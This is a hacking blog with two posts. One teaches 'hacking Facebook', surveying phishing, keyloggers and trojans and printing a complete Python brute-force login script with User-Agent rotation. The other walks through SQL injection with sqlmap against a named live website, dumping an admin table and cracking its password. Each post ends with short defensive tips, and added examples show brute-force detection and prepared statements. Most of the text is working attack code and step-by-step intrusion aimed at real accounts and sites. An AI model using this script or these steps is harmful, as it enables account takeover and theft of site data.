Saturday, 6 July 2013
HACK FACEBOOK USING BRUTEFORCE METHOD WITH HYDRA

What is Facebook Hacking?

Facebook hacking is when people steal someone else's account and crack its password.

Methods To Hack Facebook?

 1) Phishing:
The first and most basic way of hacking Facebook accounts is via phishing. Phishing means creating fake web pages to steal a user's credentials such as email, passwords, phone number, etc.
 2) Keylogging:
This is another good way of hacking Facebook accounts. In this type of attack a hacker simply sends an infected file containing a keylogger to the victim. If the victim executes that file on his PC, whatever he types will be mailed or uploaded to the hacker's server. The advantage of this attack is that the victim won't know that the hacker is getting every bit of data he is typing. Another big advantage is that the hacker will get the passwords of all the accounts used on that PC.
 3) Trojans/backdoors:
This is an advanced-level topic. A Trojan consists of a server and a client. In this type of attack the attacker sends the infected server to the victim. After execution, the infected server, i.e. the Trojan, opens a backdoor on the victim's PC, and now the hacker can do whatever he wants with the victim's PC.
 4) Sniffing:
It consists of stealing a session in progress. In this type of attack an attacker makes a connection with both server and client and relays messages between them, making them believe that they are talking to each other directly.
 5) Social Engineering:
This method includes guessing and fooling users into giving up their own passwords. In this type of attack, a hacker sends a fake mail which is very convincing and appealing and asks the user for his password.
Answering the security questions also falls under this category.
 6) Session Hijacking:
In a session hijacking attack an attacker steals the victim's cookies. Cookies store all the necessary login information about one's account; using this information an attacker can easily hack anybody's account. If you get the cookies of the victim, you can hack any account the victim is logged into, i.e. you can hack Facebook, Google, Yahoo.
HACK FACEBOOK USING BRUTEFORCE METHOD:

1) Go to Privilege Escalation, then select Online Attacks, and then select Hydra.

2) Then use a Python script for the brute force attack. You can attack the victim only when he is online.

3) Get the Python script:
#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname     : facebookbruteforcer.py
# Programmer     : krishna_ <krishnakumar.m13@gmail.com>
# Version    : 1.0
# Date        : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me ;)

import re
import os
import sys
import random
import warnings
import time
try:
    import mechanize
except ImportError:
    print "[*] Please install mechanize python module first"
    sys.exit(1)
except KeyboardInterrupt:
    print "\n[*] Exiting program...\n"
    sys.exit(1)
try:
    import cookielib
except ImportError:
    print "[*] Please install cookielib python module first"
    sys.exit(1)
except KeyboardInterrupt:
    print "\n[*] Exiting program...\n"
    sys.exit(1)
   
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

# define variable
__programmer__     = "gunslinger_ <yudha.gunslinger@gmail.com>"
__version__        = "1.0"
verbose     = False
useproxy    = False
usepassproxy    = False
log        = 'fbbruteforcer.log'
file        = open(log, "a")
success        = 'http://www.facebook.com/?sk=messages&amp;ref=mb'
fblogin     = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent     = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
            'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
            'Microsoft Internet Explorer/4.0b1 (Windows 95)',
            'Opera/8.00 (Windows NT 5.1; U; en)',
        'amaya/9.51 libwww/5.4.0',
        'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
        ]
facebook     = '''
  __               _                 _   
 / _|             | |               | |  
| |_ __ _  ___ ___| |__   ___   ___ | | __
|  _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_|  __/ |_) | (_) | (_) |   <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
                    bruteforcer...
                   
Programmer : %s
Version       : %s''' % (__programmer__, __version__)
option               = '''
Usage  : %s [options]
Option : -u, --username      <username>         |   User for bruteforcing
         -w, --wordlist      <filename>         |   Wordlist used for bruteforcing
         -v, --verbose                |   Set %s will be verbose
         -p, --proxy         <host:port>    |   Set http proxy will be use
         -k, --usernameproxy    <username>    |   Set username at proxy will be use
         -i, --passproxy    <password>    |   Set password at proxy will be use
         -l, --log         <filename>    |   Specify output filename (default : fbbruteforcer.log)
         -h, --help          <help>             |   Print this help
                                                           
Example : %s -u brad@hackme.com -w wordlist.txt"
      
P.S : add "&" to run in the background 
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme         = '''
Usage : %s [option]
    -h or --help for get help
    ''' % sys.argv[0]


def helpme():
    print facebook
    print option
    file.write(facebook)
    file.write(option)
    sys.exit(1)
   
def helpmee():
    print facebook
    print hme
    file.write(facebook)
    file.write(hme)
    sys.exit(1)
   
for arg in sys.argv:
    try:
        if arg.lower() == '-u' or arg.lower() == '--user':
                    username = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                    wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-l' or arg.lower() == '--log':
                    log = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-p' or arg.lower() == '--proxy':
                useproxy = True
                    proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-k' or arg.lower() == '--userproxy':
                usepassproxy = True
                    usw = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-i' or arg.lower() == '--passproxy':
                usepassproxy = True
                    usp = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-v' or arg.lower() == '--verbose':
                    verbose = True
            elif arg.lower() == '-h' or arg.lower() == '--help':
                helpme()
        elif len(sys.argv) <= 1:
            helpmee()
    except IOError:
        helpme()
    except NameError:
        helpme()
    except IndexError:
        helpme()
                   
def bruteforce(word):
    try:
        sys.stdout.write("\r[*] Trying %s...                    " % word)
        file.write("[*] Trying %s\n" % word)
        sys.stdout.flush()
        br.addheaders = [('User-agent', random.choice(ouruseragent))]
        opensite = br.open(fblogin)
        br.select_form(nr=0)
        br.form['email'] = username
        br.form['pass'] = word
        br.submit()
        response = br.response().read()
        if verbose:
            print response
        if success in response:
            print "\n\n[*] Logging in success..."
            print "[*] Username : %s" % (username)
            print "[*] Password : %s\n" % (word)
            file.write("\n[*] Logging in success...")
            file.write("\n[*] Username : %s" % (username))
            file.write("\n[*] Password : %s\n\n" % (word))
            sys.exit(1)   
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        sys.exit(1)
    except mechanize._mechanize.FormNotFoundError:
        print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
        file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
        sys.exit(1)
    except mechanize._form.ControlNotFoundError:
        print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
        file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
        sys.exit(1)
       
def releaser():
    global word       
    for word in words:
        bruteforce(word.replace("\n",""))
       
def main():
    global br
    global words
    try:
        br = mechanize.Browser()
        cj = cookielib.LWPCookieJar()
        br.set_cookiejar(cj)
        br.set_handle_equiv(True)
        br.set_handle_gzip(True)
        br.set_handle_redirect(True)
        br.set_handle_referer(True)
        br.set_handle_robots(False)
        br.set_debug_http(False)
        br.set_debug_redirects(False)
        br.set_debug_redirects(False)
        br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
        if useproxy:
            br.set_proxies({"http": proxy})
        if usepassproxy:
            br.add_proxy_password(usw, usp)
        if verbose:
            br.set_debug_http(True)
            br.set_debug_redirects(True)
            br.set_debug_redirects(True)
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        file.write("\n[*] Exiting program...\n")
        sys.exit(1)
    try:
        preventstrokes = open(wordlist, "r")
        words            = preventstrokes.readlines()
        count          = 0
        while count < len(words):
            words[count] = words[count].strip()
            count += 1
    except IOError:
          print "\n[*] Error: Check your wordlist path\n"
        file.write("\n[*] Error: Check your wordlist path\n")
          sys.exit(1)
    except NameError:
        helpme()
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        file.write("\n[*] Exiting program...\n")
        sys.exit(1)
    try:
        print facebook
        print "\n[*] Starting attack at %s" % time.strftime("%X")
        print "[*] Account for bruteforcing %s" % (username)
        print "[*] Loaded :",len(words),"words"
        print "[*] Bruteforcing, please wait..."
        file.write(facebook)
        file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
        file.write("\n[*] Account for bruteforcing %s" % (username))
        file.write("\n[*] Loaded : %d words" % int(len(words)))
        file.write("\n[*] Bruteforcing, please wait...\n")
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        sys.exit(1)
    try:
        releaser()
        bruteforce(word)
    except NameError:
        helpme()

if __name__ == '__main__':
    main()

4) Then create a new file, put this code in it, and save it as facebookbruteforce.py

5) Then run python facebookbruteforce.py

6) Then run python facebookbruteforce.py -h

7) Now enter your victim's mail ID: facebookbruteforce.py -u krishnakumar.m13@gmail.com -w wordlist.txt

8) We have to create a word list and upload it; after that the script will brute force the particular email, and the password will be found in the password.txt file.


How To Prevent My Facebook Account From Being Hacked?

1) You can enable Login Notification so that whenever anybody (or a hacker) tries to log in with your user ID and password, you receive a notification on your cell phone. You will then know that it is time to change your password right away, because the hacker has got your password and is trying to log in to your Facebook account.

2) To Enable Login Notification
Go to Home -> Account Settings -> Security -> Login Notification. Put a check mark on your preferred option.


3) Always check your Active Sessions. If you notice any unfamiliar location or device, it means your Facebook account is at risk. Just click on End Activity, and don't forget to change your password after that.


4) To Check Active Sessions
Go to Home -> Account Settings -> Security -> Active Sessions. 


5) Enable Secure Browsing to make your account more secure.
Go to Home-> Account Settings -> Security -> Secure Browsing
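
Seen from the service side, the script above leaves a recognisable pattern: many failed logins for one account in a short time, with a different User-Agent on almost every attempt. The following is an added example, not code from the original post, that flags that pattern in a login log; the log format, thresholds and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed (hypothetical) log format: time, result, account, source IP, User-Agent.
LINE_RE = re.compile(r'^(\S+) (OK|FAIL) user=(\S+) ip=(\S+) ua="([^"]*)"$')

def detect_bruteforce(lines, window=timedelta(minutes=5), threshold=5):
    """Return {account: details} for accounts with >= threshold failures inside window."""
    recent = defaultdict(list)  # account -> [(time, ip, user_agent)] of recent failures
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not login events
        ts, result, user, ip, ua = m.groups()
        ts = datetime.fromisoformat(ts)
        attempts = recent[user]
        while attempts and ts - attempts[0][0] > window:
            attempts.pop(0)  # forget failures older than the window
        if result == "FAIL":
            attempts.append((ts, ip, ua))
            if len(attempts) >= threshold:
                alert = alerts.setdefault(user, {"success_after_burst": False})
                alert.update(failures=len(attempts),
                             ips=sorted({a[1] for a in attempts}),
                             # one client that keeps changing User-Agent is not a browser
                             user_agents=len({a[2] for a in attempts}))
        elif user in alerts and attempts:
            # a successful login right after a burst: the password was probably guessed
            alerts[user]["success_after_burst"] = True
    return alerts

# Constructed sample data; the User-Agent strings come from the script's rotation list.
UAS = ["Opera/8.00 (Windows NT 5.1; U; en)", "amaya/9.51 libwww/5.4.0",
       "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"]
SAMPLE = ['2013-07-06T09:00:00 FAIL user=bob@example.com ip=198.51.100.4 ua="Mozilla/5.0"']
SAMPLE += ['2013-07-06T10:00:%02d FAIL user=alice@example.com ip=203.0.113.7 ua="%s"'
           % (2 * i, UAS[i % 3]) for i in range(6)]
SAMPLE += ['2013-07-06T10:00:14 OK user=alice@example.com ip=203.0.113.7 ua="%s"' % UAS[0],
           '2013-07-06T10:30:00 OK user=bob@example.com ip=198.51.100.4 ua="Mozilla/5.0"']

if __name__ == "__main__":
    for account, info in detect_bruteforce(SAMPLE).items():
        print(account, info)
```

An alert with success_after_burst set is the case where Login Notification and the Active Sessions check matter most: the session should be ended and the password changed.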


Saturday, 26 January 2013
HACKING A WEBSITE USING SQL

HACKING A WEBSITE

What is SQL Injection?

SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications, which allows hackers to inject SQL commands into, say, a login form and so gain access to the data held within your database.
In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.

How does it cause Vulnerabilities?


It can lead to vulnerabilities because attackers can send values to an application that they know will be interpolated into a SQL string. By being very clever, they can manipulate the result of queries, reading or even changing data that they shouldn't be allowed to access.


How to Use it in Backtrack?

1. Open Terminal and go to sqlmap Dir: 
- cd /pentest/web/scanners/sqlmap/
2. To use it type :
-python sqlmap.py -u http://Target.com/index.php?id=1 --dbs ( For database )
-python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) --table
-python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) -T (tablename) --colum
-python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) -T (tablename) -C (columname) --dump




1) Open a terminal in BackTrack 5
2) Type cd /pentest/database/sqlmap
3) Then type this: python sqlmap.py -u http://mappn.com/game.php?id=9 --dbs
4) http://mappn.com/game.php?id=9 is the website that we are going to hack
5) id=9 is vulnerable, that is, it is easy to hack
6) [*] information_schema
[*] us_mappn
 These are the 2 available databases in the website
7) Then search for tables and columns
8) python sqlmap.py -u http://mappn.com/game.php?id=9 -D (database name) --tables
9) Leave information_schema; it is the database that will be available for all websites
10) Then find the system admin file
11) Then type python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin --columns
12) We have already found the admin file; now we are getting the info of the admin file
13) Then type python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin -U test --dump
14) Then, using the common default dictionary method, we are cracking the password




15) Now the user ID and the password have been cracked

Now, how to find vulnerable web sites:
Go to http://mappn.com/game.php?id=9 and put (') at the end:
mappn.com/game.php?id=9' and now press Enter

Now you will see that an SQL error occurs; this means it is vulnerable.


Thank you and enjoy hacking




How to prevent SQL attack?


  • Strict type checking (don't trust what the user enters).
  • If you expect a user name to be entered, then validate that it contains only alphanumeric characters.
  • Escape or filter the special characters and user inputs.
  • Use prepared statements to execute the queries.
  • Don't allow multiple queries to be executed in a single statement.
  • Don't leak the database information to the end user by displaying "syntax errors", etc.
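
The points above, as an added example that is not part of the original post: the same lookup written the vulnerable way and the hardened way, using Python's sqlite3. The table, column and function names are assumptions made for illustration, and the database is constructed in memory.

```python
import sqlite3

def make_db():
    """Constructed in-memory database standing in for the site's backend."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE games (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
        INSERT INTO games VALUES (9, 'Chess', 1);
        INSERT INTO games VALUES (10, 'Unreleased title', 0);
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # 'Before': the request parameter is interpolated into the SQL string,
    # so whatever the client sends becomes part of the statement.
    sql = "SELECT title FROM games WHERE published = 1 AND id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_safe(db, raw_id):
    # Strict type check: an id is a short run of ASCII digits; anything else
    # is rejected before it gets near the database.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 18):
        return None
    try:
        # Prepared statement: the value is bound as data, never parsed as SQL.
        # execute() also runs a single statement only, so stacked queries fail.
        sql = "SELECT title FROM games WHERE published = 1 AND id = ?"
        return db.execute(sql, (int(raw_id),)).fetchall()
    except sqlite3.Error:
        return None  # log server-side; the client gets a generic "not found"

def probe(db, lookup, raw_id):
    """Return what a client would observe: rows, None, or a leaked DB error."""
    try:
        return lookup(db, raw_id)
    except sqlite3.Error as exc:
        return "DB error: %s" % exc

if __name__ == "__main__":
    db = make_db()
    for value in ["9", "9'", "9 OR 1=1"]:
        print(repr(value), probe(db, lookup_vulnerable, value),
              probe(db, lookup_safe, value))
```

With the vulnerable lookup, the single quote surfaces a database syntax error and the OR 1=1 value returns the unpublished row as well; the hardened lookup answers both with the same empty result.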